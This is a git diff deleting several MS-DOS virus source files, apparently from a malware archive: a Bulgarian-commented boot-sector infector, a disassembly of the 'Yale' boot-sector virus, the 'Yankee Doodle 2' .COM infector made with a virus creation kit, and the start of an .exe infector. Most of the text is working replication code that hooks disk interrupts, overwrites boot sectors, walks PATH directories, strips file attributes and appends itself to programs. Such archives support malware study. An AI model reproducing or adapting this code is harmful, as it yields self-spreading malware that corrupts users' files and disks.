register - mov ds,ax - cli ; Disable interrupts - mov ss,ax - mov sp,7C00h - sti ; - mov ax,word ptr ds:[4Ch] ; ®±² ¢¿ ¢ AX ¢¥ª²®°  ­  INT 13H - mov word ptr ds:[7C09h],ax ; ‡ ¯ §¢  £® ­  ®²¬¥±²¢ ­¥ 9h - mov ax,word ptr ds:[4Eh] ; ‚§¥¬  ±¥£¬¥­²  ­  INT 13H - mov word ptr ds:[7C0Bh],ax ; ‡ ¯ §¢  £® ­  ®²¬¥±²¢ ­¥ Bh - mov ax,word ptr ds:[413h] ;  ¬ «¿¢  ­ «¨·­ ²  ¯ ¬¥² ± 1K - dec ax - dec ax - mov word ptr ds:[413h],ax - mov cl,6 - shl ax,cl - mov es,ax ; ‡ °¥¦¤  ¢ ES ­ ©-¢¨±®ª¨¿  ¤°¥± - mov word ptr ds:[7C0Fh],ax ; ­  ª®©²® ±¥ ¯°¥¬¥±²¢  - mov ax,15h - mov word ptr ds:[4Ch],ax ; INT 13H ‘Ž—ˆ Ž’Œ…‘’‚€… 15H Ž’ - mov word ptr ds:[4Eh],es ; Ž—€‹Ž’Ž Œ“ - mov cx,1B8h - push cs ;CS = 7C0h = DS - pop ds - xor si,si - mov di,si - cld - rep movsb ; °¥±²¢  1B8h ¡ ©²  - jmp cs:data_29 ; °¥µ®¤ ­  ±«¥¤¢ ¹ ²  ¨­±²°³ª¶¨¿ - mov ax,0 - int 13h ; ¥ª «¨¡°¨°  ¤¨±ª  - - xor ax,ax ; Zero register - mov es,ax ; ES = AX = 00h - mov ax,201h ; “±² ­®¢¿¢  ¯ ° ¬¥²°¨ §  - mov bx,7C00h ; § °¥¦¤ ­¥ ­  BOOT - cmp cs:data_27,0 ; °®¢¥°¿¢  ´« £ §  ³±²°®¨±²¢® - je loc_9 ; °¥µ®¤ ¯°¨ Flopy disk - mov cx,7 - mov dx,80h - int 13h ; ‡ °¥¦¤  BOOT - - jmp short loc_12 ; (014E) - nop -loc_9: - mov cx,3 - mov dx,100h - int 13h ; ‡ °¥¦¤  BOOT - - jc loc_12 ; Jump if carry Set - test byte ptr es:[46Ch],7 ; °®¢¥°¿¢  ¤ «¨ ¤  ¤ ¤¥ - jnz loc_11 ; ±º®¡¹¥­¨¥ - mov si,189h ; - push cs - pop ds -loc_10: - lodsb ; ’º°±¨ ª° ¿² ­  ±²°¨­£  - or al,al - jz loc_11 ; €ª® ­¥ ¥ ª° ¿ ¨§¢¥¦¤  ±¨¬¢®« - mov ah,0Eh - mov bh,0 - int 10h ; Video display ah=functn 0Eh - ; write char al, teletype mode - jmp short loc_10 ; (011D) -loc_11: - push cs - pop es - mov ax,201h ; ޝ¨²¢  ±¥ ¤  ·¥²¥ ®² ²¢º°¤ ¤¨±ª - mov bx,200h ; ª ²® ¯®¬¥±²¢  ¯°®·¥²¥­®²® ®² - mov cl,1 ; ®²¬¥±²¢ ­¥ 200h - mov dx,80h - int 13h ; Disk dl=drive #: ah=func a2h - ; read sectors to memory es:bx - jc loc_12 ; €ª® £°¥¸ª  ? 
-> ˆ§µ®¤ - push cs - pop ds - mov si,200h - mov di,0 - lodsw ; °®¢¥°¿¢  ¤ «¨ ±º¢¯ ¤  ± ­ · «®²® - cmp ax,[di] ; ­  ¢¨°³±  - jne loc_13 ; €ª® ­¥ ¯°¥µ®¤ §  § ° §¿¢ ­¥ - lodsw - cmp ax,[di+2] - jne loc_13 -loc_12: - mov cs:data_27,0 ; (6B8E:0008=0) - jmp cs:data_30 ; ˆ§¯º«­¿¢  BOOT -loc_13: - mov cs:data_27,2 ; ®±² ¢¿ ³ª § ²¥« ²¢º°¤ ¤¨±ª - mov ax,301h - mov bx,200h ; °¥¬¥±²¢  BOOT ¢ ±¥ª²®° 7 - mov cx,7 ; ±²° ­  0 - mov dx,80h - int 13h - - jc loc_12 ; °¨ £°¥¸ª  ¨§¯º«­¿¢  BOOT - push cs - pop ds - push cs - pop es - mov si,3BEh ; Œ¥±²¨ partition table - mov di,1BEh - mov cx,242h - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - - mov ax,301h - xor bx,bx ; ‡ ¯¨±¢  ± ¬¨¿² ¢¨°³± - inc cl - int 13h ; Disk dl=drive #: ah=func a3h - ; write sectors from mem es:bx - jmp short loc_12 ; ޲¨¢  ¤  ¨§¯¨«­¿¢  BOOT - -;------------------------------------------------------------------------------------------ -; ޲ ²³ª ­ ² ²ª ±  ²¥ª±²®¢¥ -;------------------------------------------------------------------------------------------ - - pop es - pop cx - db 6Fh - jnz $+74h ; Jump if not zero - and [bx+si+43h],dl - and [bx+di+73h],ch - and [bp+6Fh],ch - ja $+22h ; Jump if above - push bx - jz $+71h ; Jump if zero - db 6Eh - db 65h - db 64h - and [bx],ax - or ax,0A0Ah - add [si+45h],cl - inc di - inc cx - dec sp - dec cx - push bx - inc bp - xor al,[bx+di] - add al,32h ; '2' - add word ptr ds:[0B00h][bx+si],ax ; (6B7E:0B00=0) - add ax,132h - db 72 dup (0) - \ No newline at end of file diff --git a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yale-asm.asm b/MSDOS/Y-Index/Virus.MSDOS.Unknown.yale-asm.asm deleted file mode 100644 index b8c2592c..00000000 --- a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yale-asm.asm +++ /dev/null 
@@ -1,365 +0,0 @@ -;****************************************************************************; -; ; -; -=][][][][][][][][][][][][][][][=- ; -; -=] P E R F E C T C R I M E [=- ; -; -=] +31.(o)79.426o79 [=- ; -; -=] [=- ; -; -=] For All Your H/P/A/V Files [=- ; -; -=] SysOp: Peter Venkman [=- ; -; -=] [=- ; -; -=] +31.(o)79.426o79 [=- ; -; -=] P E R F E C T C R I M E [=- ; -; -=][][][][][][][][][][][][][][][=- ; -; ; -; *** NOT FOR GENERAL DISTRIBUTION *** ; -; ; -; This File is for the Purpose of Virus Study Only! It Should not be Passed ; -; Around Among the General Public. It Will be Very Useful for Learning how ; -; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; -; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; -; Experience can Turn it Into a far More Malevolent Program Than it Already ; -; Is. Keep This Code in Responsible Hands! ; -; ; -;****************************************************************************; - page 65,132 - title The 'Yale' Virus -; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» -; º British Computer Virus Research Centre º -; º 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England º -; º Telephone: Domestic 0273-26105, International +44-273-26105 º -; º º -; º The 'Yale' Virus º -; º Disassembled by Joe Hirst, April 1989 º -; º º -; º Copyright (c) Joe Hirst 1989. º -; º º -; º This listing is only to be made available to virus researchers º -; º or software writers on a need-to-know basis. º -; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ - - ; The virus consists of a boot sector only on a floppy disk. - ; The original boot sector is kept at track thirty-nine, head zero, - ; sector eight. 
- - ; The disassembly has been tested by re-assembly using MASM 5.0 - ; Note that this does not create an identical program, as the original - ; appears to have been assembled with A86 - - ; MASM would not assemble the instruction at offset 003CH (7C3CH) - ; This instruction is undefined on an 8088/8086, and illegal - ; on a 80286/80386. - - ; The program requires an origin address of 7C00H for the first sector - ; to load and run as a boot sector - - ; System variables are defined in either RAM or BOOT (or both) - ; depending on the segment used by the program - -RAM SEGMENT AT 400H - - ; System RAM fields - - ORG 13H -BW0413 DW ? ; Total RAM size - ORG 17H -BB0417 DB ? ; Key toggles - ORG 72H -BW0472 DW ? ; System reset word - -RAM ENDS - -BOOT SEGMENT AT 0 - - ; Interrupt addresses - - ORG 24H -BW0024 DW ? ; Interrupt 9 offset -BW0026 DW ? ; Interrupt 9 segment - ORG 64H -BW0064 DW ? ; Interrupt 19H offset -BW0066 DW ? ; Interrupt 19H segment - - ; System RAM fields - - ORG 410H -DW0410 DW ? ; System configuration - ORG 413H -DW0413 DW ? ; Total RAM size - - ; BIOS field - - ORG 0E502H -DWE502 DW ? - -BOOT ENDS - -CODE SEGMENT BYTE PUBLIC 'CODE' - - ASSUME CS:CODE,DS:NOTHING - -START: CLI - XOR AX,AX ; \ Set SS to zero - MOV SS,AX ; / - MOV SP,7C00H ; Set stack before boot area - STI - ASSUME DS:RAM - MOV BX,0040H ; \ Address RAM area - MOV DS,BX ; / - MOV AX,BW0413 ; Get size of RAM - MUL BX ; Convert to paragraphs - SUB AX,07E0H ; Subtract address after boot area - MOV ES,AX ; Target segment - ASSUME DS:CODE - PUSH CS ; \ Set DS to CS - POP DS ; / - CMP DI,3456H ; Simulated system reset? 
- JNE BP0010 ; Branch if not - DEC GENNUM[7C00H] ; Decrement generation number -BP0010: MOV SI,SP ; \ Address boot sector area - MOV DI,SI ; / - MOV CX,0200H ; 512 bytes to move - CLD - REPZ MOVSB ; Copy virus to high core - MOV SI,CX ; Address offset zero - MOV DI,7B80H ; Address interrupt save area - MOV CX,0080H ; 128 bytes to move - REPZ MOVSB ; Save first 32 interrupt pointers - CALL BP0030 ; Install interrupt 9 routine - PUSH ES ; \ Transfer to high core -; POP CS ; / - DB 0FH ; This is the previous instruction - PUSH DS ; \ Set ES to DS - POP ES ; / - MOV BX,SP ; Address boot sector area - MOV DX,CX ; A-drive, head zero - MOV CX,2708H ; Track 39, sector 8 - MOV AX,0201H ; Read one sector - INT 13H ; Disk I/O -BP0020: JB BP0020 ; Loop on error - JMP BP0190 - - ; Install interrupt 9 routine - -BP0030: DEC DW0413 ; Decrement RAM size - MOV SI,OFFSET BW0024 ; Address INT 9 pointer - MOV DI,OFFSET INT_09+7C00H ; Target far jump - MOV CX,4 ; 4 bytes to copy - CLI - REPZ MOVSB ; Copy far address - MOV BW0024,OFFSET BP0050+7C00H ; Install new offset - MOV BW0026,ES ; Install new segment - STI - RET - - ; Ctrl-Alt-Del depressed - acknowledge keyboard signal - -BP0040: IN AL,61H ; Get port B - MOV AH,AL ; Save current state - OR AL,80H ; Turn top bit on - OUT 61H,AL ; Set port B - XCHG AL,AH ; Get original state - OUT 61H,AL ; Reset port B - JMP SHORT BP0110 - - ; Format table for track 39, head zero, 8 sectors (unused) - - DB 027H, 000H, 001H, 002H - DB 027H, 000H, 002H, 002H - DB 027H, 000H, 003H, 002H - DB 027H, 000H, 004H, 002H - DB 027H, 000H, 005H, 002H - DB 027H, 000H, 006H, 002H - DB 027H, 000H, 007H, 002H - DB 027H, 000H, 008H, 002H - - ; Rubbish - - DB 024H, 000H, 0ADH, 07CH, 0A3H, 026H, 000H, 059H - DB 05FH, 05EH, 007H, 01FH, 058H, 09DH, 0EAH, 011H - DB 011H, 011H, 011H - - ; Interrupt 9 routine - -BP0050: PUSHF - STI - PUSH AX - PUSH BX - PUSH DS - PUSH CS ; \ Set DS to CS - POP DS ; / - ASSUME DS:CODE - MOV BX,KYSTAT[7C00H] ; Get Ctrl & Alt key states - 
IN AL,60H ; Get keyboard token - MOV AH,AL ; Save keyboard token - AND AX,887FH - CMP AL,1DH ; Was key Ctrl? - JNE BP0060 ; Branch if not - MOV BL,AH ; Save Ctrl key state - JMP SHORT BP0080 - -BP0060: CMP AL,38H ; Was key Alt? - JNE BP0070 ; Branch if not - MOV BH,AH ; Save Alt key state - JMP SHORT BP0080 - -BP0070: CMP BX,0808H ; Are Ctrl & Alt depressed? - JNE BP0080 ; Branch if not - CMP AL,17H ; Is key I? - JE BP0100 ; Branch if yes - CMP AL,53H ; Is key Del? - JE BP0040 ; Branch if yes -BP0080: MOV KYSTAT[7C00H],BX ; Save Ctrl & Alt key states -BP0090: POP DS - POP BX - POP AX - POPF - DB 0EAH ; Far jump to original INT 9 -INT_09 DW 0E987H, 0F000H - - ; Pass on Ctrl-Alt-I - -BP0100: JMP BP0240 ; Ctrl-Alt-I - - ; Ctrl-Alt-Del depressed - main processing - -BP0110: MOV DX,03D8H ; VDU mode control address - MOV AX,0800H ; Delay eight cycles - OUT DX,AL ; Disable display - CALL BP0250 ; Delay - MOV KYSTAT[7C00H],AX ; Reset Ctrl & Alt key states - MOV AL,3 ; Mode three - INT 10H ; VDU I/O - MOV AH,2 ; Set cursor address function - XOR DX,DX ; Row zero, column zero - MOV BH,DH ; Page zero - INT 10H ; VDU I/O - MOV AH,1 ; Set cursor size function - MOV CX,0607H ; Cursor lines 6 to 7 - INT 10H ; VDU I/O - MOV AX,0420H ; Delay 4 cycles - CALL BP0250 ; Delay - CLI - OUT 20H,AL ; End of interrupt - MOV ES,CX ; Address segment zero - MOV DI,CX ; Address offset zero - MOV SI,7B80H ; Address interrupt save area - MOV CX,0080H ; 128 bytes to move - CLD - REPZ MOVSB ; Restore first 32 interrupt pointers - MOV DS,CX ; Address zero - MOV BW0064,OFFSET BP0130+7C00H ; Install Int 19H offset - MOV BW0066,CS ; Install Int 19H segment - ASSUME DS:RAM - MOV AX,0040H ; \ Address RAM area - MOV DS,AX ; / - MOV BB0417,AH ; Set key toggles off - INC BW0413 ; Restore RAM size - PUSH DS - ASSUME DS:BOOT - MOV AX,0F000H ; \ Address BIOS - MOV DS,AX ; / - CMP DWE502,21E4H ; Is BIOS instruction IN AL,21H? 
- POP DS - JE BP0120 ; Branch if yes - INT 19H ; Disk bootstrap - -BP0120: DB 0EAH ; Far jump to BIOS routine - DW 0E502H, 0F000H - - ; Interrupt 19H routine - - ASSUME DS:BOOT -BP0130: XOR AX,AX ; \ Set DS to zero - MOV DS,AX ; / - MOV AX,DW0410 ; Get system configuration - TEST AL,1 ; Is there a floppy disk - JNZ BP0150 ; Branch if yes -BP0140: PUSH CS ; \ Set ES to CS - POP ES ; / - CALL BP0030 ; Install interrupt 9 routine - INT 18H ; Basica (IBM only) - -BP0150: MOV CX,4 ; Retry four times -BP0160: PUSH CX ; Save retry count - MOV AH,0 ; Reset disk sub-system - INT 13H ; Disk I/O - JB BP0170 ; Branch if error - MOV AX,0201H ; Read one sector - PUSH DS ; \ Set ES to DS - POP ES ; / - MOV BX,7C00H ; Boot sector buffer - MOV CX,1 ; Track zero, sector one - INT 13H ; Disk I/O -BP0170: POP CX ; Retrieve retry count - JNB BP0180 ; Branch if no error - LOOP BP0160 ; Retry - JMP BP0140 - -BP0180: CMP DI,3456H ; Simulated system reset? - JNE BP0200 ; Branch if not -BP0190: DB 0EAH ; Far jump to boot sector area - DW 7C00H, 0 - -BP0200: MOV SI,7C00H ; Boot sector area - MOV CX,OFFSET INT_09 ; Length to compare - MOV DI,SI ; Virus offset - PUSH CS ; \ Set ES to CS - POP ES ; / - CLD - REPZ CMPSB ; Is boot sector infected? 
- JE BP0220 ; Branch if yes - INC ES:GENNUM[7C00H] ; Increment generation number - MOV BX,7C7AH ; Address format table - MOV DX,0 ; Head zero, drive zero - MOV CH,27H ; Track 39 - MOV AH,5 ; Format track - JMP SHORT BP0210 ; This line was probably an INT 13H - - JB BP0230 ; Error branch for deleted INT 13H -BP0210: MOV ES,DX ; \ Write from boot sector area - MOV BX,7C00H ; / - MOV CL,8 ; Sector eight - MOV AX,0301H ; Write one sector - INT 13H ; Disk I/O - PUSH CS ; \ Set ES to CS - POP ES ; / - JB BP0230 ; Branch if error - MOV CX,1 ; Track zero, sector one - MOV AX,0301H ; Write one sector - INT 13H ; Disk I/O - JB BP0230 ; Branch if error -BP0220: MOV DI,3456H ; Signal simulated system reset - INT 19H ; Disk bootstrap - -BP0230: CALL BP0030 ; Install interrupt 9 routine - DEC ES:GENNUM[7C00H] ; Decrement generation number - JMP BP0190 - - ; Ctrl-Alt-I - - ASSUME DS:CODE -BP0240: MOV KYSTAT[7C00H],BX ; Save Ctrl & Alt key states - MOV AX,GENNUM[7C00H] ; Get generation number - ASSUME DS:RAM - MOV BX,0040H ; \ Address RAM area - MOV DS,BX ; / - MOV BW0472,AX ; Generation to system reset word - JMP BP0090 ; Pass on to original interrupt - - ; Delay - -BP0250: SUB CX,CX ; Maximum count -BP0260: LOOP BP0260 ; Delay loop - SUB AH,1 ; Decrement count - JNZ BP0260 ; Repeat loop - RET - - DB 027H, 000H, 008H, 002H ; Last sector of format table -GENNUM DW 016H ; Generation number -KYSTAT DW 0 ; Ctrl & Alt key states - DB 027H, 000H, 008H, 002H ; Last sector of format table - -CODE ENDS - - END START - \ No newline at end of file diff --git a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yankee2.asm b/MSDOS/Y-Index/Virus.MSDOS.Unknown.yankee2.asm deleted file mode 100644 index 5ef5dd11..00000000 --- a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yankee2.asm +++ /dev/null 
@@ -1,342 +0,0 @@ -; YANKEE2.ASM -- Yankee Doodle ][ -; Created with Nowhere Man's Virus Creation Laboratory v1.00 -; Written by Nowhere Man - -virus_type equ 0 ; Appending Virus -is_encrypted equ 0 ; We're not encrypted -tsr_virus equ 0 ; We're not TSR - -code segment byte public - assume cs:code,ds:code,es:code,ss:code - org 0100h - -main proc near - db 0E9h,00h,00h ; Near jump (for compatibility) -start: call find_offset ; Like a PUSH IP -find_offset: pop bp ; BP holds old IP - sub bp,offset find_offset ; Adjust for length of host - - lea si,[bp + buffer] ; SI points to original start - mov di,0100h ; Push 0100h on to stack for - push di ; return to main program - movsw ; Copy the first two bytes - movsb ; Copy the third byte - - mov di,bp ; DI points to start of virus - - mov bp,sp ; BP points to stack - sub sp,128 ; Allocate 128 bytes on stack - - mov ah,02Fh ; DOS get DTA function - int 021h - push bx ; Save old DTA address on stack - - mov ah,01Ah ; DOS set DTA function - lea dx,[bp - 128] ; DX points to buffer on stack - int 021h - - call search_files ; Find and infect a file - call search_files ; Find and infect another file - call get_hour - cmp ax,0011h ; Did the function return 17? - jle skip00 ; If less that or equal, skip effect - cmp ax,0013h ; Did the function return 19? - jge skip00 ; If greater than or equal, skip effect - jmp short strt00 ; Success -- skip jump -skip00: jmp end00 ; Skip the routine -strt00: lea si,[di + data00] ; SI points to data -get_note: mov bx,[si] ; Load BX with the frequency - or bx,bx ; Is BX equal to zero? - je play_tune_done ; If it is we are finished - - mov ax,034DDh ; - mov dx,0012h ; - cmp dx,bx ; - jnb new_note ; - div bx ; This bit here was stolen - mov bx,ax ; from the Turbo C++ v1.0 - in al,061h ; library file CS.LIB. I - test al,3 ; extracted sound() from the - jne skip_an_or ; library and linked it to - or al,3 ; an .EXE file, then diassembled - out 061h,al ; it. 
Basically this turns - mov al,0B6h ; on the speaker at a certain - out 043h,al ; frequency. -skip_an_or: mov al,bl ; - out 042h,al ; - mov al,bh ; - out 042h,al ; - - mov bx,[si + 2] ; BX holds duration value - xor ah,ah ; BIOS get time function - int 1Ah - add bx,dx ; Add the time to the length -wait_loop: int 1Ah ; Get the time again (AH = 0) - cmp dx,bx ; Is the delay over? - jne wait_loop ; Repeat until it is - - in al,061h ; Stolen from the nosound() - and al,0FCh ; procedure in Turbo C++ v1.0. - out 061h,al ; This turns off the speaker. - -new_note: add si,4 ; SI points to next note - jmp short get_note ; Repeat with the next note -play_tune_done: - -end00: -com_end: pop dx ; DX holds original DTA address - mov ah,01Ah ; DOS set DTA function - int 021h - - mov sp,bp ; Deallocate local buffer - - xor ax,ax ; - mov bx,ax ; - mov cx,ax ; - mov dx,ax ; Empty out the registers - mov si,ax ; - mov di,ax ; - mov bp,ax ; - - ret ; Return to original program -main endp - -search_files proc near - mov bx,di ; BX points to the virus - push bp ; Save BP - mov bp,sp ; BP points to local buffer - sub sp,135 ; Allocate 135 bytes on stack - - mov byte ptr [bp - 135],'\' ; Start with a backslash - - mov ah,047h ; DOS get current dir function - xor dl,dl ; DL holds drive # (current) - lea si,[bp - 134] ; SI points to 64-byte buffer - int 021h - - call traverse_path ; Start the traversal - -traversal_loop: cmp word ptr [bx + path_ad],0 ; Was the search unsuccessful? 
- je done_searching ; If so then we're done - call found_subdir ; Otherwise copy the subdirectory - - mov ax,cs ; AX holds the code segment - mov ds,ax ; Set the data and extra - mov es,ax ; segments to the code segment - - xor al,al ; Zero AL - stosb ; NULL-terminate the directory - - mov ah,03Bh ; DOS change directory function - lea dx,[bp - 70] ; DX points to the directory - int 021h - - lea dx,[bx + com_mask] ; DX points to "*.COM" - push di - mov di,bx - call find_files ; Try to infect a .COM file - mov bx,di - pop di - jnc done_searching ; If successful the exit - jmp short traversal_loop ; Keep checking the PATH - -done_searching: mov ah,03Bh ; DOS change directory function - lea dx,[bp - 135] ; DX points to old directory - int 021h - - cmp word ptr [bx + path_ad],0 ; Did we run out of directories? - jne at_least_tried ; If not then exit - stc ; Set the carry flag for failure -at_least_tried: mov sp,bp ; Restore old stack pointer - pop bp ; Restore BP - ret ; Return to caller -com_mask db "*.COM",0 ; Mask for all .COM files -search_files endp - -traverse_path proc near - mov es,word ptr cs:[002Ch] ; ES holds the enviroment segment - xor di,di ; DI holds the starting offset - -find_path: lea si,[bx + path_string] ; SI points to "PATH=" - lodsb ; Load the "P" into AL - mov cx,08000h ; Check the first 32767 bytes - repne scasb ; Search until the byte is found - mov cx,4 ; Check the next four bytes -check_next_4: lodsb ; Load the next letter of "PATH=" - scasb ; Compare it to the environment - jne find_path ; If there not equal try again - loop check_next_4 ; Otherwise keep checking - - mov word ptr [bx + path_ad],di ; Save the PATH address - mov word ptr [bx + path_ad + 2],es ; Save the PATH's segment - ret ; Return to caller - -path_string db "PATH=" ; The PATH string to search for -path_ad dd ? 
; Holds the PATH's address -traverse_path endp - -found_subdir proc near - lds si,dword ptr [bx + path_ad] ; DS:SI points to PATH - lea di,[bp - 70] ; DI points to the work buffer - push cs ; Transfer CS into ES for - pop es ; byte transfer -move_subdir: lodsb ; Load the next byte into AL - cmp al,';' ; Have we reached a separator? - je moved_one ; If so we're done copying - or al,al ; Are we finished with the PATH? - je moved_last_one ; If so get out of here - stosb ; Store the byte at ES:DI - jmp short move_subdir ; Keep transfering characters - -moved_last_one: xor si,si ; Zero SI to signal completion -moved_one: mov word ptr es:[bx + path_ad],si ; Store SI in the path address - ret ; Return to caller -found_subdir endp - -find_files proc near - push bp ; Save BP - - mov ah,02Fh ; DOS get DTA function - int 021h - push bx ; Save old DTA address - - mov bp,sp ; BP points to local buffer - sub sp,128 ; Allocate 128 bytes on stack - - push dx ; Save file mask - mov ah,01Ah ; DOS set DTA function - lea dx,[bp - 128] ; DX points to buffer - int 021h - - mov ah,04Eh ; DOS find first file function - mov cx,00100111b ; CX holds all file attributes - pop dx ; Restore file mask -find_a_file: int 021h - jc done_finding ; Exit if no files found - call infect_file ; Infect the file! 
- jnc done_finding ; Exit if no error - mov ah,04Fh ; DOS find next file function - jmp short find_a_file ; Try finding another file - -done_finding: mov sp,bp ; Restore old stack frame - mov ah,01Ah ; DOS set DTA function - pop dx ; Retrieve old DTA address - int 021h - - pop bp ; Restore BP - ret ; Return to caller -find_files endp - -infect_file proc near - mov ah,02Fh ; DOS get DTA address function - int 021h - mov si,bx ; SI points to the DTA - - mov byte ptr [di + set_carry],0 ; Assume we'll fail - - cmp word ptr [si + 01Ah],(65279 - (finish - start)) - jbe size_ok ; If it's small enough continue - jmp infection_done ; Otherwise exit - -size_ok: mov ax,03D00h ; DOS open file function, r/o - lea dx,[si + 01Eh] ; DX points to file name - int 021h - xchg bx,ax ; BX holds file handle - - mov ah,03Fh ; DOS read from file function - mov cx,3 ; CX holds bytes to read (3) - lea dx,[di + buffer] ; DX points to buffer - int 021h - - mov ax,04202h ; DOS file seek function, EOF - cwd ; Zero DX _ Zero bytes from end - mov cx,dx ; Zero CX / - int 021h - - xchg dx,ax ; Faster than a PUSH AX - mov ah,03Eh ; DOS close file function - int 021h - xchg dx,ax ; Faster than a POP AX - - sub ax,finish - start + 3 ; Adjust AX for a valid jump - cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet? - je infection_done ; If equal then exit - mov byte ptr [di + set_carry],1 ; Success -- the file is OK - add ax,finish - start ; Re-adjust to make the jump - mov word ptr [di + new_jump + 1],ax ; Construct jump - - mov ax,04301h ; DOS set file attrib. 
function - xor cx,cx ; Clear all attributes - lea dx,[si + 01Eh] ; DX points to victim's name - int 021h - - mov ax,03D02h ; DOS open file function, r/w - int 021h - xchg bx,ax ; BX holds file handle - - mov ah,040h ; DOS write to file function - mov cx,3 ; CX holds bytes to write (3) - lea dx,[di + new_jump] ; DX points to the jump we made - int 021h - - mov ax,04202h ; DOS file seek function, EOF - cwd ; Zero DX _ Zero bytes from end - mov cx,dx ; Zero CX / - int 021h - - mov ah,040h ; DOS write to file function - mov cx,finish - start ; CX holds virus length - lea dx,[di + start] ; DX points to start of virus - int 021h - - mov ax,05701h ; DOS set file time function - mov cx,[si + 016h] ; CX holds old file time - mov dx,[si + 018h] ; DX holds old file date - int 021h - - mov ah,03Eh ; DOS close file function - int 021h - - mov ax,04301h ; DOS set file attrib. function - xor ch,ch ; Clear CH for file attribute - mov cl,[si + 015h] ; CX holds file's old attributes - lea dx,[si + 01Eh] ; DX points to victim's name - int 021h - -infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed - ret ; Return to caller - -set_carry db ? ; Set-carry-on-exit flag -buffer db 090h,0CDh,020h ; Buffer to hold old three bytes -new_jump db 0E9h,?,? 
; New jump to virus -infect_file endp - - -get_hour proc near - mov ah,02Ch ; DOS get time function - int 021h - mov al,ch ; Copy hour into AL - cbw ; Sign-extend AL into AX - ret ; Return to caller -get_hour endp - -data00 dw 262,6,262,6,293,6,329,6,262,6,329,6,293,6,196,6 - dw 262,6,262,6,293,6,329,6,262,12,262,12 - dw 262,6,262,6,293,6,329,6,349,6,329,6,293,6,262,6 - dw 246,6,196,6,220,6,246,6,262,12,262,12 - dw 220,6,246,6,220,6,174,6,220,6,246,6,262,6,220,6 - dw 196,6,220,6,196,6,174,6,164,6,174,6,196,7 - dw 220,6,246,6,220,6,174,6,220,6,246,6,262,6,220,7 - dw 196,6,262,6,246,6,293,6,262,12,262,12 - dw 0 - -vcl_marker db "[VCL]",0 ; VCL creation marker - - -note db "[Yankee Doodle 2]",0 - db "Nowhere Man, [NuKE] '92",0 - -finish label near - -code ends - end main \ No newline at end of file diff --git a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yanshort.asm b/MSDOS/Y-Index/Virus.MSDOS.Unknown.yanshort.asm deleted file mode 100644 index 99cb4e1a..00000000 --- a/MSDOS/Y-Index/Virus.MSDOS.Unknown.yanshort.asm +++ /dev/null 
@@ -1,1129 +0,0 @@ -.MODEL SMALL -.CODE - -comment / - Good luck! - - Vladimir Botchev, CICT-BAS, december 1988 - - / - -data_area struc ;Define a pattern for working data - ;area -DS_save dw ? -ES_save dw ? -IP_save dw ? -CS_save dw ? -SS_save dw ? -filematch db '*.exe',00h ;Names for files to infect -matchall db '*.*',00h ;needed for the matching procedure -infected dw 00h ;A very useful flag -help_flag dw 00h ;These two flags are needed to -where_from_flag dw 00h ;determine if virus is free running - ;or from an infected program - ;therefore it's very important - ;that where_from_flag value - ;is set to zero at assembly time -handle dw ? -ip_old dw ? ;old instruction pointer -cs_old dw ? ;old value of code segment -ss_old dw ? -far_push dw ? -save_push dw ? -buffer1 db '\',63 dup (?) -virus_stamp db 'motherfucker' ;Very hard to obtain in - ;a random way - -buffer2 db 2b0h dup (?) -new_area db 64 dup (?) -new_data db 64 dup (?) -pointer1 dw ? -pointer2 dw ? -pointer3 dw ? -pointer4 dw ? -pointer5 dw ? -pointer6 dw ? -pointer7 dw ? -pointer8 dw ? 
- -data_area ends - - org 100h ;Defined for .com file as virus must - ;be able to run on itself -start: call setup_data ;This is a near call therefore it's a - ;three byte instruction.It's purpose is - ;to catch correct data area address - ;even when virus is appended to the - ;infected .exe program -adjust equ offset pgm_start ;Known offset value -pgm_start label word ; - -virussize equ 2793 - - work: mov ax,ds ;Save old DS - push cs - pop ds ;Update to needed DS value - mov si,offset buffer.DS_save ;Put old DS in a quiet place - sub si,adjust - add si,bx - mov [si],ax - - mov si,offset buffer.ES_save ;Save it because Get DTA side effects - sub si,adjust - add si,bx - mov ax,es - mov [si],ax - push cs ;Imperative because DI usage - pop es - - push bx ;It's imperative to always keep - ;this value unchanged - mov ax,2f00h ;Get DTA function call - int 21h - - mov cx,bx ;save address found - pop bx - mov si,offset buffer.pointer1 - sub si,adjust - add si,bx - mov [si],cx - add si,2 ;Locate the segment immediately above - mov ax,es - mov [si],ax - push cs - pop es - - mov di,offset buffer.buffer1 ;adjust for first search - inc di ;Jump over the '\' - sub di,adjust - add di,bx - mov dx,0000h - push bx - call search_exe - pop bx - mov si,offset buffer.where_from_flag - sub si,adjust - add si,bx - cmp word ptr [si],0000h - jnz infected_run - int 020H - -infected_run: - mov si,offset buffer.pointer1 - sub si,adjust - add si,bx - mov dx,[si] - push ds - mov ax,[si+2] - mov ds,ax - push bx - mov ax,1a00h - int 21h - pop bx - pop ds ;Restore original DTA - - mov si,offset buffer.ES_save - sub si,adjust - add si,bx - mov ax,[si] - mov es,ax ;Restore ES - - ;Here you can do whatever you want - - push bx - call mary_proc - pop bx - - - - mov si,offset buffer.IP_save - sub si,adjust - add si,bx - mov ax,[si] - mov dx,[si+2] - mov si,offset buffer.far_push ;Restore original code - sub si,adjust ;segment - add si,bx - mov cx,[si] - push ax - mov ax,cs - sub ax,cx - mov di,ax ;For 
